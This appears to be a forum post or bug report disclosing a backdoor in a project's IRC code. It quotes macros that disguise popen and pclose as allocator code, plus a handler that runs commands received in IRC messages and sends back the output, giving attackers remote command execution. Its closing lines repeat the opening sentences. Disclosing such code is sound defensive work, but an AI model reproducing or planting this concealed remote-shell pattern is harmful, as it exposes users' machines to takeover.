There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host.
In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls:
/** Determine system page size in bytes */
#define S_ORDER(a,b,c,d) b##a##d##c
/**
* OS-dependent memory page locking/unlocking.
* Defined as policy class to make stubbing for test possible.
*/
#define CLine S_ORDER(I,F,E,L)
/**
* Singleton class to keep track of locked (ie, non-swappable) memory pages, for use in
* std::allocator templates.
*/
#define CRead S_ORDER(p,po,n,e)
#define CFree S_ORDER(cl,p,e,os)
//
// Allocator that locks its contents from being paged
// out of memory and clears its contents before deletion.
//
#define CBuff "PR" "IV" "M" "SG"
Then in irc.cpp they are used to implement the backdoor:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
I expect this is a known issue since this kind of thing doesn't happen accidentally.
There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host.
In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls:
Then in irc.cpp they are used to implement the backdoor:
I expect this is a known issue since this kind of thing doesn't happen accidentally.